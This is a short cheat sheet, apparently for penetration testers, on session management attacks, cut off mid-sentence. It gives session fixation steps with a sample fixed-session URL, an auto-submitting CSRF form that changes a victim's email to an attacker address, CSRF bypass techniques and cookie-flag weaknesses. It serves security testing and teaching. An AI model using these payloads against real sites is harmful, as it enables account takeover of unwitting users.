session-attackslisted

# Session Management Attacks ## Session Fixation ``` 1. Attacker obtains a pre-auth session token 2. Attacker sends victim a link with the fixed session: https://target.com/login?PHPSESSID=attacker_session 3. Victim logs in — server assigns that session to the authenticated user 4. Attacker uses the same session token to access victim's account ``` **Test:** Check if the session token changes after successful login. No change = likely fixation vulnerability. ## CSRF (Cross-Site Request Forgery) ```html <!-- Auto-submitting CSRF form hosted on attacker.com --> <form id="csrf" action="https://target.com/api/change-email" method="POST"> <input name="email" value="attacker@attacker.com"> </form> <script>document.getElementById('csrf').submit();</script> ``` **CSRF bypass techniques:** - No CSRF token: attack directly - CSRF token not tied to session: reuse your own valid token - Referrer check bypass: send from target.com subdomain (open redirect) or remove Referer header - Token in URL: change to POST and test if GET token accepted - SameSite=Lax: CSRF via top-level GET navigation with side effects ## Cookie Security Analysis ``` Secure flag: Missing → token sent over HTTP → interception risk HttpOnly flag: Missing → token accessible via XSS → document.cookie SameSite: None → CSRF from cross-origin → test CSRF attacks Domain: .target.com → token sent to all subdomains → subdomain takeover → session theft Expiry: No expiry → session persists indefin